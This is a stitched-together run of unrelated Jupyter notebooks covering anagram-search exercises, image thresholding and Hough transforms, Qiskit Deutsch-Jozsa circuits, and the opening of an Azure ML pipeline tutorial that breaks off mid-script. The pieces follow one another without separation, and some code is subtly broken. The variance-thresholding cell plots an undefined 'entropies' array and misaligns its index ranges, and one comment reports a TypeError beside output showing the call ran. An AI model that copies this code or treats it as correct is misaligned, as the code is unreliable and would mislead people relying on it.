###Markdown
**Exercise 4:** Loop through the word list and print all words that are anagrams of `stop`. Now run `all_anagram_pairs` with the full `word_list`:
###Code
# pairs = all_anagram_pairs(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 5:** While that's running, let's estimate how long it's going to take. A better algorithm**Exercise 6:** Write a better algorithm! Hint: make a dictionary. How much faster is your algorithm?
###Code
def all_anagram_lists(word_list):
"""Finds all anagrams in a list of words.
word_list: sequence of strings
"""
return {}
%time anagram_map = all_anagram_lists(word_list)
len(anagram_map)
###Output
_____no_output_____
###Markdown
Computer Vision 💻 🤓This notebook contains some implementations of Computer Vision/Image processing algorithms. Grayscale resolution
###Code
import sys
import math
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from __future__ import print_function
from ipywidgets import interact
import ipywidgets as widgets
def threshold(res):
img = np.asarray(Image.open('images/lena.png').convert('L')).copy()
step = math.ceil(255/res)
regions = [(x, x+step, x+step-1) for x in range(0,255,step)]
for (lo, hi, color) in regions:
img[np.logical_and(img>=lo, img<hi)] = color
plt.imshow(img, cmap='gray')
plt.show()
_ = interact(threshold, res=widgets.IntSlider(min=2,max=16,step=1,value=4))
###Output
_____no_output_____
###Markdown
Variance based thresholding (Otsu, 1979) Assume image has a grayscale resolution of $L$ gray levels.The number of pixels with gray level $i$ is written as $n_{i}$, so the total number of pixels in the image is $N = n_{1} + n_{2} + \ldots + n_{L}$. Thus, the probability of a pixel having gray level $i$ is:\begin{equation} p_{i}=\frac{n_{i}}{N}\end{equation}where\begin{equation} p_{i}>=0 \qquad \sum_{i=1}^{L} p_{i}=1\end{equation}Compute between-class variance $\sigma_{B}^2$ and total variance $\sigma_{T}^2$ using $k$:\begin{equation} \sigma_{B}^2=\pi_{0}(\mu_{0} - \mu_{T})^2 + \pi_{1}(\mu_{1} - \mu_{T})^2\end{equation}\begin{equation} \sigma_{T}^2=\sum_{i=1}^{L}(i - \mu_{T})^2p_{i}\end{equation}where\begin{equation} \pi_{0}=\sum_{i=1}^{k}p_{i} \qquad \pi_{1}=\sum_{i=k+1}^{L}p_{i}=1-{\pi_{0}}\end{equation}\begin{equation} \mu_{0}=\sum_{i=1}^{k}ip_{i}/\pi_{0} \quad \mu_{1}=\sum_{i=k+1}^{L}ip_{i}/\pi_{1} \quad \mu_{T}=\sum_{i=1}^{L}ip_{i}\end{equation}The formula for the between-class variance can be simplified to:\begin{equation} \sigma_{B}^2=\pi_{0}\pi_{1}(\mu_{1} - \mu_{0})^2\end{equation}For a single threshold, the criterion to be maximized is the ratio of the between-class variance to the total variance:\begin{equation} \eta=\frac{\sigma_{B}^2}{\sigma_{T}^2}\end{equation}Taken from Computer and Machine Vision (Fourth Edition): Theory, Algorithms, Practicalities. E.R. Davies.
###Code
import sys
import numpy as np
from PIL import Image
image = np.asarray(Image.open('images/lena.png').convert('L'))
img = image.copy()
hist, _ = np.histogram(img, bins=256)
def histogram_variance(hist, k):
probs = hist / hist.sum()
pi_zero = np.sum(probs[:k])
pi_one = 1 - pi_zero
def compute_mi_zero():
factors = np.array(range(0,k)) / pi_zero
return np.dot(probs[:k], factors)
def compute_mi_one():
factors = np.array(range(k+1, probs.size+1)) / pi_one
return np.dot(probs[k:], factors)
def compute_mi_t():
factors = np.array(range(0, probs.size))
return np.dot(probs, factors)
mi_zero = compute_mi_zero()
mi_one = compute_mi_one()
mi_t = compute_mi_t()
variance_b = pi_zero * pi_one * (mi_one - mi_zero) ** 2
def compute_variance_t():
factors = (np.array(range(0, probs.size)) - mi_t) ** 2
return np.dot(probs, factors)
variance_t = compute_variance_t()
variances_ratio = variance_b / variance_t
return variances_ratio
def variance_based_thresholding(hist):
ratios = np.array([histogram_variance(hist, x) for x in range(0,256)])
return np.argmax(ratios), ratios
k, ratios = variance_based_thresholding(hist)
black_region = np.where(img >= k)
white_region = np.where(img < k)
img[black_region] = 0
img[white_region] = 255
fig, (ax1, ax2) = plt.subplots(1, 2)
fig.set_figwidth(10)
ax1.set_title(f'When k={k}')
ax1.imshow(img, cmap='gray')
plt.plot(k, entropies[k], 'go')
ax2.plot(entropies)
ax2.set_title('Variances ratios')
ax2.set_xlabel(f'k')
_ = ax2.set_ylabel('in_between_variance/total_variance')
###Output
_____no_output_____
###Markdown
Entropy based thresholding (Kapur et al., 1985)Divide intensity probability distribution in two classes: those with gray levels up to the threshold value $k$ and those with gray levels above $k$. This leads to two probability distributions A and B:\begin{equation} A: \frac{p_{1}}{P_{k}}, \frac{p_{2}}{P_{k}}, \ldots, \frac{p_{k}}{P_{k}}\end{equation}\begin{equation} B: \frac{p_{k+1}}{1-p_{k}}, \frac{p_{k+2}}{1-p_{k}}, \ldots, \frac{p_{L}}{1-p_{k}}\end{equation}where:\begin{equation} P_{k}=\sum_{i=1}^{k}p_{i} \qquad 1-p_{k}=\sum_{i=k+1}^{L}p_{i}\end{equation}\begin{equation} H(A)=-\sum_{i=1}^{k}\frac{p_{i}}{P_{k}}\ln{\frac{p_{i}}{P_{k}}}\end{equation}\begin{equation} H(B)=-\sum_{i=k+1}^{L}\frac{p_{i}}{1-P_{k}}\ln{\frac{p_{i}}{1-P_{k}}}\end{equation}and the total entropy is:\begin{equation} H(k) = H(A) + H(B)\end{equation}Taken from Computer and Machine Vision (Fourth Edition): Theory, Algorithms, Practicalities. E.R. Davies.
###Code
import sys
import math
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
image = np.asarray(Image.open('images/lena.png').convert('L'))
img = image.copy()
hist, _ = np.histogram(img, bins=256)
def histogram_entropy(hist, k):
probs = hist / hist.sum()
pk = np.sum(probs[:k])
pk_complement = 1 - pk
a_dist = probs[:k] / pk
b_dist = probs[k:] / pk_complement
def dist_entropy(dist):
def entropy(x):
if x > 0:
return -x * math.log(x)
else:
return 0
entropy_v = np.vectorize(entropy, otypes=[np.dtype('f8')])
return np.sum(entropy_v(dist))
entropy_a = dist_entropy(a_dist)
entropy_b = dist_entropy(b_dist)
total_entropy = entropy_a + entropy_b
return total_entropy
def maximum_entropy_thresholding(hist):
entropies = np.array([histogram_entropy(hist, x) for x in range(0,256)])
return np.argmax(entropies), entropies
k, entropies = maximum_entropy_thresholding(hist)
black_region = np.where(img >= k)
white_region = np.where(img < k)
img[black_region] = 0
img[white_region] = 255
fig, (ax1, ax2) = plt.subplots(1, 2)
fig.set_figwidth(10)
ax1.set_title(f'When k={k}')
ax1.imshow(img, cmap='gray')
plt.plot(k, entropies[k], 'go')
ax2.plot(entropies)
ax2.set_title('Entropies')
ax2.set_xlabel(f'k')
_ = ax2.set_ylabel('H(k)')
###Output
_____no_output_____
###Markdown
Line Hough transform
###Code
import sys
import math
import cv2
import numpy as np
import matplotlib.pyplot as plt
from __future__ import print_function
from ipywidgets import interact
import ipywidgets as widgets
def hough_transform(canny_abajo, canny_arriba, umbral_lineas):
image_color = cv2.imread("images/cuadrado.png")
image = cv2.cvtColor(image_color, cv2.COLOR_BGR2GRAY)
bordes = cv2.Canny(image, canny_abajo, canny_arriba)
(w,h) = image.shape
diagonal = math.ceil(math.sqrt(w ** 2 + h** 2))
espacio_p = np.zeros((diagonal, 181))
for i in range(w):
for j in range(h):
if bordes[i][j] != 0:
for t in range(-90, 90+1):
p = (i * math.cos(t)) + (j * math.sin(t))
espacio_p[math.floor(p)][t+90] += 1
lineas = np.argwhere(espacio_p > umbral_lineas)
for (p,theta) in lineas:
a = math.sin(theta-90)
b = math.cos(theta-90)
x = a*p
y = b*p
p1 = (math.floor(x+1000*(-b)), math.floor(y+1000*a))
p2 = (math.floor(x-1000*(-b)), math.floor(y-1000*a))
cv2.line(image_color, p1, p2, (0,255,0))
plt.imshow(cv2.cvtColor(image_color, cv2.COLOR_BGR2RGB))
plt.show()
_ = interact(
hough_transform,
canny_abajo=widgets.IntSlider(min=0,max=255,step=1,value=100),
canny_arriba=widgets.IntSlider(min=0,max=255,step=1,value=200),
umbral_lineas=widgets.IntSlider(min=0,max=255,step=1,value=70)
)
###Output
_____no_output_____
###Markdown
Circle Hough transform
###Code
import sys
import math
import cv2
import numpy as np
import matplotlib.pyplot as plt
from __future__ import print_function
from ipywidgets import interact
import ipywidgets as widgets
def circle_hough_transform(canny_abajo, canny_arriba, umbral_circulos, radio_estimado):
image_color = cv2.imread("images/circulos.jpg")
image = cv2.cvtColor(image_color, cv2.COLOR_BGR2GRAY)
bordes = cv2.Canny(image, canny_abajo, canny_arriba)
(w, h) = image.shape
espacio_p = np.zeros((w+1,h+1))
for i in range(w):
for j in range(h):
if bordes[i][j] != 0:
for t in range(0, 360+1):
a= i - (radio_estimado*math.cos(t))
b= j - (radio_estimado*math.sin(t))
if (a>=0 and b>=0 and a<=w-1 and b<=h-1):
espacio_p[math.floor(a), math.floor(b)] += 1
circulo_centros = np.argwhere(espacio_p > umbral_circulos)
for centro in circulo_centros:
cv2.circle(image_color, tuple(reversed(centro)), radio_estimado, (0,160,277))
plt.imshow(cv2.cvtColor(image_color, cv2.COLOR_BGR2RGB))
plt.show()
_ = interact(
circle_hough_transform,
canny_abajo=widgets.IntSlider(min=0, max=255, step=1, value=100),
canny_arriba=widgets.IntSlider(min=0, max=255, step=1, value=200),
umbral_circulos=widgets.IntSlider(min=0, max=255, step=1, value=40),
radio_estimado=widgets.IntSlider(min=0, max=255, step=1, value=100)
)
###Output
_____no_output_____
###Markdown
Custom BFS-based segmentation algorithmNote that this algorithm is very slow.
###Code
import sys
import queue
import random
import cv2
import numpy as np
import matplotlib.pyplot as plt
from __future__ import print_function
from ipywidgets import interact
import ipywidgets as widgets
class Explorador:
def __init__(self, imagen, d):
self.imagen = imagen
self.d = d
self.vecindario = 1
self.vecindarios = np.zeros(imagen.shape, dtype=np.int64)
self.w,self.h = self.imagen.shape
self.cola = queue.Queue()
def movimiento_valido(self, m, n):
return m >= 0 and n >= 0 and m <= self.w - 1 and n <= self.h - 1
def es_vecino(self, actual, siguiente):
return siguiente <= actual + self.d and siguiente >= actual - self.d
def explorado(self, m, n):
return self.vecindarios[m, n] != 0
def busqueda(self, m, n):
self.vecindarios[m,n] = self.vecindario
self.cola.put((m, n))
while not self.cola.empty():
x,y = self.cola.get()
for direccion_x, direccion_y in [(1, 0),(-1, 0),(0, 1),(0, -1)]:
movimiento_x = x + direccion_x
movimiento_y = y + direccion_y
if self.movimiento_valido(movimiento_x, movimiento_y) and \
(not self.explorado(movimiento_x, movimiento_y)) and \
self.es_vecino(self.imagen[x,y], self.imagen[movimiento_x,movimiento_y]):
self.vecindarios[movimiento_x,movimiento_y] = self.vecindario
self.cola.put((movimiento_x,movimiento_y))
def descubrir_vecindarios(self):
for x in range(self.w):
for y in range(self.h):
if self.vecindarios[x,y] == 0: # 0 es no se ha visitado
self.busqueda(x,y)
self.vecindario+=1
return self.vecindarios
def vecindarios_coloreados(imagen):
color = lambda: (random.randint(0,255),random.randint(0,255),random.randint(0,255))
w,h = imagen.shape
coloreada = np.zeros((w,h,3), np.uint8)
num_vecindarios = np.amax(imagen)
for vecindario in range(num_vecindarios + 1):
coloreada[np.where(imagen == (vecindario + 1))] = color()
return coloreada
def descubrir_vecindarios(d):
imagen = cv2.imread("images/lena.png", 0)
e = Explorador(imagen, d)
resultado = e.descubrir_vecindarios()
plt.imshow(cv2.cvtColor(vecindarios_coloreados(resultado), cv2.COLOR_BGR2RGB))
plt.show()
descubrir_vecindarios(3)
###Output
_____no_output_____
###Markdown
Algorithms *Data Structures and Information Retrieval in Python*Copyright 2021 Allen DowneyLicense: [Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International](https://creativecommons.org/licenses/by-nc-sa/4.0/) Searching for anagramsIn this notebook we'll implement algorithms for two tasks:* Testing a pair of words to see if they are anagrams of each other, that is, if you can rearrange the letters in one word to spell the other.* Searching a list of words for all pairs that are anagrams of each other.There is a point to these examples, which I will explain at the end. **Exercise 1:** Write a function that takes two words and returns `True` if they are anagrams. Test your function with the examples below.
###Code
from collections import Counter
def is_anagram(word1, word2):
return sorted(word1) == sorted(word2)
%timeit is_anagram('tachymetric', 'mccarthyite')
is_anagram('tachymetric', 'mccarthyite') # True
is_anagram('post', 'top') # False, letter not present
is_anagram('pott', 'top') # False, letter present but not enough copies
is_anagram('top', 'post') # False, letters left over at the end
###Output
_____no_output_____
###Markdown
**Exercise 2:** Use `timeit` to see how fast your function is for these examples:
###Code
%timeit is_anagram('tops', 'spot')
%timeit is_anagram('tachymetric', 'mccarthyite')
###Output
751 ns ± 3.52 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)
###Markdown
NOTE: How can we compare algorithms running on different computers? Searching for anagram pairs **Exercise 3:** Write a function that takes a word list and returns a list of all anagram pairs.
###Code
short_word_list = ['proudest', 'stop', 'pots', 'tops', 'sprouted']
for i,j in enumerate(short_word_list):
print(i,j)
def all_anagram_pairs(word_list):
## Step1
lengths = {}
for i in word_list:
n = len(i)
if n in lengths:
lengths[n] += [i]
else:
lengths[n] = [i]
pairs = []
## Step2
for key,val in enumerate(word_list):
length = len(val)
for i in lengths[length]:
if is_anagram(val,i) and val !=i and sorted([val,i]) not in pairs:
pairs.append(sorted([val,i]))
return pairs
# Solution goes here
all_anagram_pairs(short_word_list)
###Output
_____no_output_____
###Markdown
The following cell downloads a file containing a list of English words.
###Code
from os.path import basename, exists
def download(url):
filename = basename(url)
if not exists(filename):
from urllib.request import urlretrieve
local, _ = urlretrieve(url, filename)
print('Downloaded ' + local)
download('https://github.com/AllenDowney/DSIRP/raw/main/american-english')
###Output
_____no_output_____
###Markdown
The following function reads a file and returns a set of words (I used a set because after we convert words to lower case, there are some repeats.)
###Code
def read_words(filename):
"""Read lines from a file and split them into words."""
res = set()
for line in open(filename):
for word in line.split():
res.add(word.strip().lower())
return res
word_list = read_words('american-english')
len(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 4:** Loop through the word list and print all words that are anagrams of `stop`.
###Code
for i in word_list:
if is_anagram(i,'stop'):
print(i)
###Output
stop
spot
tops
pots
opts
post
###Markdown
Now run `all_anagram_pairs` with the full `word_list`:
###Code
pairs = all_anagram_pairs([*word_list]) ## Set type is not sss
###Output
_____no_output_____
###Markdown
**Exercise 5:** While that's running, let's estimate how long it's going to take.
###Code
%time all_anagram_pairs(word_list) ## TypeError: 'set' object is not subscriptable
###Output
CPU times: user 26.6 ms, sys: 2.75 ms, total: 29.3 ms
Wall time: 28.9 ms
###Markdown
A better algorithm**Exercise 6:** Write a better algorithm! Hint: make a dictionary. How much faster is your algorithm?
###Code
def all_anagram_lists(word_list):
"""Finds all anagrams in a list of words.
word_list: sequence of strings
"""
## Step1
lengths = {}
for i in word_list:
n = len(i)
if n in lengths:
lengths[n] += [i]
else:
lengths[n] = [i]
pairs_list = {}
## Step2
for key,val in enumerate(word_list):
length = len(val)
for i in lengths[length]:
if is_anagram(val,i) and val !=i:
if val in pairs_list:
pairs_list[val].append(i)
else:
pairs_list[val] = [i]
if key%100 == 0:
print(key)
return pairs_list
pairs = all_anagram_lists([*word_list])
%time anagram_map = all_anagram_lists(word_list)
len(anagram_map)
# Solution goes here
###Output
_____no_output_____
###Markdown
SummaryWhat is the point of the examples in this notebook?* The different versions of `is_anagram` show that, when inputs are small, it is hard to say which algorithm will be the fastest. It often depends on details of the implementation. Anyway, the differences tend to be small, so it might not matter much in practice.* The different algorithms we used to search for anagram pairs show that, when inputs are large, we can often tell which algorithm will be fastest. And the difference between a fast algorithm and a slow one can be huge! ExercisesBefore you work on these exercises, you might want to read the Python [Sorting How-To](https://docs.python.org/3/howto/sorting.html). It uses `lambda` to define an anonymous function, which [you can read about here](https://www.w3schools.com/python/python_lambda.asp).**Exercise 7:**Make a dictionary like `anagram_map` that contains only keys that map to a list with more than one element. You can use a `for` loop to make a new dictionary, or a [dictionary comprehension](https://www.freecodecamp.org/news/dictionary-comprehension-in-python-explained-with-examples/).
###Code
# Solution goes here
###Output
_____no_output_____
###Markdown
**Exercise 8:**Find the longest word with at least one anagram. Suggestion: use the `key` argument of `sort` or `sorted` ([see here](https://stackoverflow.com/questions/8966538/syntax-behind-sortedkey-lambda)).
###Code
# Solution goes here
###Output
_____no_output_____
###Markdown
**Exercise 9:**Find the largest list of words that are anagrams of each other.
###Code
# Solution goes here
###Output
_____no_output_____
###Markdown
**Exercise 10:**Write a function that takes an integer `word_length` and finds the longest list of words with the given length that are anagrams of each other.
###Code
# Solution goes here
# Solution goes here
###Output
_____no_output_____
###Markdown
**Exercise 11:**At this point we have a data structure that contains lists of words that are anagrams, but we have not actually enumerated all pairs.Write a function that takes `anagram_map` and returns a list of all anagram pairs.How many are there?
###Code
# Solution goes here
# Solution goes here
# Solution goes here
# Solution goes here
###Output
_____no_output_____
###Markdown
Quantum Algorithms using Qiskit
###Code
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
# Importing standard Qiskit libraries and configuring account
from qiskit import QuantumCircuit, execute
from qiskit.providers.aer import QasmSimulator, StatevectorSimulator
from qiskit.visualization import *
from qiskit.quantum_info import *
###Output
_____no_output_____
###Markdown
The Hadamard operation on multiple qubits Creating Equal SuperpositionsThe $n$-qubit $|0_n\rangle$ state denotes a state where all qubits are in the $|0\rangle$ state. It is sometimes also written as $|0^{\otimes n}\rangle$. We've seen that the Hadamard transformation can create equal superposition states starting from the $|0\rangle$ state. $$H|0\rangle = \frac{1}{\sqrt{2}} (|0\rangle +|1\rangle)$$Similarly, the transformation $H\otimes H \equiv H^{\otimes 2}$ can create a uniform superposition of all two-qubit basis states starting from the $|00\rangle$ state.$$(H \otimes H) |00\rangle = \frac{1}{\sqrt{2}} (|0\rangle +|1\rangle) \otimes \frac{1}{\sqrt{2}} (|0\rangle +|1\rangle) = \frac{1}{2}(|00\rangle+|01\rangle+|10\rangle+|11\rangle)= \frac{1}{2}(|0\rangle+|1\rangle+|2\rangle+|3\rangle)$$Thus, for the case of $n$ qubits, the operation $H^{\otimes n}$ creates a uniform superposition of all $n$-qubit basis states starting from the $|0^{\otimes n}\rangle$ state.$$H^{\otimes n}|0^{\otimes n}\rangle = \frac{1}{2^{n/2}}\sum\limits_{i=0}^{2^n-1} |i\rangle$$ Self-inversion of the Hadamard TransformationWe already know that the $H$ gate is self-adjoint, which also means it is it's own inverse. It is easy to see that the Hadamard transformation on $n$ qubits also has the same property. For two qubits, $$ |00\rangle \xrightarrow{(H \otimes H)} \frac{1}{2}(|0\rangle+|1\rangle+|2\rangle+|3\rangle) \xrightarrow{(H \otimes H)} |00\rangle $$In general, $$ |0^{\otimes n}\rangle \xrightarrow{H^{\otimes n}} \frac{1}{2^{n/2}}\sum\limits_{i=0}^{2^n-1} |i\rangle \xrightarrow{H^{\otimes n}} |0^{\otimes n}\rangle $$This is true for not only the $|00\rangle$ state, but all states. For example, consider the two qubit state $|01\rangle$$$ |01\rangle \xrightarrow{(H \otimes H)} \frac{1}{2}(|00\rangle-|01\rangle+|10\rangle-|11\rangle) \xrightarrow{(H \otimes H)} |01\rangle $$ The effect of the Hadamard Transformation on general statesThe general effect of the Hadamard transformation on a general state $|x\rangle$ is given as$$H^{\otimes n}|x\rangle = \frac{1}{2^{n/2}}\sum\limits_{y=0}^{2^n-1}(-1)^{x\cdot y}|y\rangle$$where $x\cdot y = x_0\cdot y_0 \oplus y = x_1\cdot y_1 \oplus \cdots \oplus x_{n-1}\cdot y_{n-1}$So, the Hadamard transformation will take ONLY the uniform superpostion with no relative phases to the $|0^{\otimes n}\rangle$ state.
###Code
qch = QuantumCircuit(3)
# State Preparation
qch.h(range(3))
qch.barrier()
qch.z(1)
qch.barrier()
# qch.h(range(3))
qch.draw(output='mpl')
jobh = execute(qch.reverse_bits(), backend=StatevectorSimulator())
sv = jobh.result().get_statevector()
mods = np.absolute(sv)
phases = np.angle(sv)
colors = cm.brg(phases/(2*np.pi))
plt.title('Statevector')
plt.bar(range(8), mods, color=colors)
###Output
_____no_output_____
###Markdown
Oracles The action of a bit oracle is $|x\rangle|0\rangle \xrightarrow{U_f} |x\rangle|f(x)\rangle$.The action of a phase oracle is $|x\rangle|-\rangle \xrightarrow{U_f} (-1)^{f(x)}|x\rangle|-\rangle$. 1-bit Boolean function OraclesBelow are the truth tables for all four 1-bit Boolean functions. | x | $f_0$ | $f_1$ | $f_2$ | $f_3$ ||--- |---------- |---------- |---------- |---------- || 0 | 0 | 0 | 1 | 1 || 1 | 0 | 1 | 0 | 1 |We will now make bit-oracles for each of these
###Code
f0_oracle = QuantumCircuit(2)
f0_oracle.draw(output='mpl')
f1_oracle = QuantumCircuit(2)
f1_oracle.cx(0,1)
f1_oracle.draw(output='mpl')
f2_oracle = QuantumCircuit(2)
f2_oracle.x(0)
f2_oracle.cx(0,1)
f2_oracle.x(0)
f2_oracle.draw(output='mpl')
f3_oracle = QuantumCircuit(2)
f3_oracle.x(1)
f3_oracle.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Deutsch AlgorithmThe action of a bit oracle is $\frac{1}{\sqrt{2}}(|0\rangle + |1\rangle)\otimes |0\rangle \xrightarrow{U_f} \frac{1}{\sqrt{2}}(|0\rangle|f(0)\rangle + |1\rangle|f(1)\rangle) $.The action of a phase oracle is $\frac{1}{\sqrt{2}}(|0\rangle + |1\rangle)\otimes |-\rangle \xrightarrow{U_f} \frac{1}{\sqrt{2}}((-1)^{f(0)}|0\rangle + (-1)^{f(1)}|1\rangle)\otimes |-\rangle $.
###Code
qc_d = QuantumCircuit(2,1) # (num_qubits, num_bits)
# last qubit in state |1>
qc_d.x(1)
# Hadamard everything before
qc_d.h(range(2))
qc_d.barrier()
# Extend the citcuit with the oracle here
qc_d.extend(f1_oracle)
qc_d.barrier()
# Hadamard everything after
qc_d.h(range(2))
# Measure all but the last qubit
qc_d.measure(0,0)
qc_d.draw(output='mpl')
job_d = execute(qc_d.reverse_bits(), backend=QasmSimulator(), shots=1024)
plot_histogram(job_d.result().get_counts())
###Output
_____no_output_____
###Markdown
Deutsch-Jozsa AlgorithmThis is the multi-qubit generalisation of the Deutsch algorithm. The procedure is exactly the same as the Deutsch algorithm. $$\left(\frac{1}{2^{n/2}}\sum\limits_{x=0}^{2^n-1} |x\rangle \right) \otimes |-\rangle \xrightarrow{U_f}\left(\frac{1}{2^{n/2}}\sum\limits_{x=0}^{2^n-1} (-1)^{f(x)}|x\rangle \right) \otimes |-\rangle $$The important underlying idea is that only the constant function imparts equal phase shifts to all the basis state componenents and hence the final Hadamard transformation will result in the $|0^{\otimes n}\rangle$ Two-bit Boolean function oraclesLet us construct oracles for one constant function $f_c$ and one balanced function $f_b$. | $x_1$ | $x_0$ | $f_c$ | $f_b$ ||------- |------- |------- |------- || 0 | 0 | 0 | 0 || 0 | 1 | 0 | 1 || 1 | 0 | 0 | 0 || 1 | 1 | 0 | 1 |
###Code
fc_oracle = QuantumCircuit(3)
fc_oracle.draw(output='mpl')
fb_oracle = QuantumCircuit(3)
fb_oracle.cx(0,2)
fb_oracle.draw(output='mpl')
qc_dj = QuantumCircuit(3,2) # (num_qubits, num_bits)
# last qubit in state |1>
qc_dj.x(2)
# Hadamard everything before
qc_dj.h(range(3))
qc_dj.barrier()
# Extend the citcuit with the oracle here
qc_dj.extend(fb_oracle)
qc_dj.barrier()
# Hadamard everything after
qc_dj.h(range(3))
# Measure all but the last qubit
qc_dj.measure([0,1],[0,1]) # ([list of qubits], [list of bits])
qc_dj.draw(output='mpl')
job_dj = execute(qc_dj.reverse_bits(), backend=QasmSimulator(), shots=1024)
plot_histogram(job_dj.result().get_counts())
###Output
_____no_output_____
###Markdown
Algorithms [Click here to run this chapter on Colab](https://colab.research.google.com/github/AllenDowney/DSIRP/blob/main/notebooks/algorithms.ipynb) Searching for anagramsIn this notebook we'll implement algorithms for two tasks:* Testing a pair of words to see if they are anagrams of each other, that is, if you can rearrange the letters in one word to spell the other.* Searching a list of words for all pairs that are anagrams of each other.There is a point to these examples, which I will explain at the end. **Exercise 1:** Write a function that takes two words and returns `True` if they are anagrams. Test your function with the examples below.
###Code
def is_anagram(word1, word2):
return False
is_anagram('tachymetric', 'mccarthyite') # True
is_anagram('post', 'top') # False, letter not present
is_anagram('pott', 'top') # False, letter present but not enough copies
is_anagram('top', 'post') # False, letters left over at the end
is_anagram('topss', 'postt') # False
###Output
_____no_output_____
###Markdown
**Exercise 2:** Use `timeit` to see how fast your function is for these examples:
###Code
%timeit is_anagram('tops', 'spot')
%timeit is_anagram('tachymetric', 'mccarthyite')
###Output
_____no_output_____
###Markdown
How can we compare algorithms running on different computers? Searching for anagram pairs **Exercise 3:** Write a function that takes a word list and returns a list of all anagram pairs.
###Code
short_word_list = ['proudest', 'stop', 'pots', 'tops', 'sprouted']
def all_anagram_pairs(word_list):
return []
all_anagram_pairs(short_word_list)
###Output
_____no_output_____
###Markdown
The following cell downloads a file containing a list of English words.
###Code
from os.path import basename, exists
def download(url):
filename = basename(url)
if not exists(filename):
from urllib.request import urlretrieve
local, _ = urlretrieve(url, filename)
print('Downloaded ' + local)
download('https://github.com/AllenDowney/DSIRP/raw/main/american-english')
###Output
_____no_output_____
###Markdown
The following function reads a file and returns a set of words (I used a set because after we convert words to lower case, there are some repeats.)
###Code
def read_words(filename):
"""Read lines from a file and split them into words."""
res = set()
for line in open(filename):
for word in line.split():
res.add(word.strip().lower())
return res
word_list = read_words('american-english')
len(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 4:** Loop through the word list and print all words that are anagrams of `stop`. Now run `all_anagram_pairs` with the full `word_list`:
###Code
# pairs = all_anagram_pairs(word_list)
###Output
_____no_output_____
###Markdown
**Exercise 5:** While that's running, let's estimate how long it's going to take. A better algorithm**Exercise 6:** Write a better algorithm! Hint: make a dictionary. How much faster is your algorithm?
###Code
def all_anagram_lists(word_list):
"""Finds all anagrams in a list of words.
word_list: sequence of strings
"""
return {}
%time anagram_map = all_anagram_lists(word_list)
len(anagram_map)
###Output
_____no_output_____ |
04 Build and operate machine learning solutions with Azure Databricks/mslearn-dp100/08 - Create a Pipeline.ipynb | ###Markdown
Create a PipelineYou can perform the various steps required to ingest data, train a model, and register the model individually by using the Azure ML SDK to run script-based experiments. However, in an enterprise environment it is common to encapsulate the sequence of discrete steps required to build a machine learning solution into a *pipeline* that can be run on one or more compute targets; either on-demand by a user, from an automated build process, or on a schedule.In this notebook, you'll bring together all of these elements to create a simple pipeline that pre-processes data and then trains and registers a model. Connect to your workspaceTo get started, connect to your workspace.> **Note**: If you haven't already established an authenticated session with your Azure subscription, you'll be prompted to authenticate by clicking a link, entering an authentication code, and signing into Azure.
###Code
import azureml.core
from azureml.core import Workspace
# Load the workspace from the saved config file
ws = Workspace.from_config()
print('Ready to use Azure ML {} to work with {}'.format(azureml.core.VERSION, ws.name))
###Output
_____no_output_____
###Markdown
Prepare dataIn your pipeline, you'll use a dataset containing details of diabetes patients. Run the cell below to create this dataset (if you created it previously, the code will find the existing version)
###Code
from azureml.core import Dataset
default_ds = ws.get_default_datastore()
if 'diabetes dataset' not in ws.datasets:
default_ds.upload_files(files=['./data/diabetes.csv', './data/diabetes2.csv'], # Upload the diabetes csv files in /data
target_path='diabetes-data/', # Put it in a folder path in the datastore
overwrite=True, # Replace existing files of the same name
show_progress=True)
#Create a tabular dataset from the path on the datastore (this may take a short while)
tab_data_set = Dataset.Tabular.from_delimited_files(path=(default_ds, 'diabetes-data/*.csv'))
# Register the tabular dataset
try:
tab_data_set = tab_data_set.register(workspace=ws,
name='diabetes dataset',
description='diabetes data',
tags = {'format':'CSV'},
create_new_version=True)
print('Dataset registered.')
except Exception as ex:
print(ex)
else:
print('Dataset already registered.')
###Output
_____no_output_____
###Markdown
Create scripts for pipeline stepsPipelines consist of one or more *steps*, which can be Python scripts, or specialized steps like a data transfer step that copies data from one location to another. Each step can run in its own compute context. In this exercise, you'll build a simple pipeline that contains two Python script steps: one to pre-process some training data, and another to use the pre-processed data to train and register a model.First, let's create a folder for the script files we'll use in the pipeline steps.
###Code
import os
# Create a folder for the pipeline step files
experiment_folder = 'diabetes_pipeline'
os.makedirs(experiment_folder, exist_ok=True)
print(experiment_folder)
###Output
_____no_output_____
###Markdown
Now let's create the first script, which will read data from the diabetes dataset and apply some simple pre-processing to remove any rows with missing data and normalize the numeric features so they're on a similar scale.The script includes a argument named **--prepped-data**, which references the folder where the resulting data should be saved.
###Code
%%writefile $experiment_folder/prep_diabetes.py
# Import libraries
import os
import argparse
import pandas as pd
from azureml.core import Run
from sklearn.preprocessing import MinMaxScaler
# Get parameters
parser = argparse.ArgumentParser()
parser.add_argument("--input-data", type=str, dest='raw_dataset_id', help='raw dataset')
parser.add_argument('--prepped-data', type=str, dest='prepped_data', default='prepped_data', help='Folder for results')
args = parser.parse_args()
save_folder = args.prepped_data
# Get the experiment run context
run = Run.get_context()
# load the data (passed as an input dataset)
print("Loading Data...")
diabetes = run.input_datasets['raw_data'].to_pandas_dataframe()
# Log raw row count
row_count = (len(diabetes))
run.log('raw_rows', row_count)
# remove nulls
diabetes = diabetes.dropna()
# Normalize the numeric columns
scaler = MinMaxScaler()
num_cols = ['Pregnancies','PlasmaGlucose','DiastolicBloodPressure','TricepsThickness','SerumInsulin','BMI','DiabetesPedigree']
diabetes[num_cols] = scaler.fit_transform(diabetes[num_cols])
# Log processed rows
row_count = (len(diabetes))
run.log('processed_rows', row_count)
# Save the prepped data
print("Saving Data...")
os.makedirs(save_folder, exist_ok=True)
save_path = os.path.join(save_folder,'data.csv')
diabetes.to_csv(save_path, index=False, header=True)
# End the run
run.complete()
###Output
_____no_output_____
###Markdown
Now you can create the script for the second step, which will train a model. The script includes a argument named **--training-data**, which references the location where the prepared data was saved by the previous step.
###Code
%%writefile $experiment_folder/train_diabetes.py
# Import libraries
from azureml.core import Run, Model
import argparse
import pandas as pd
import numpy as np
import joblib
import os
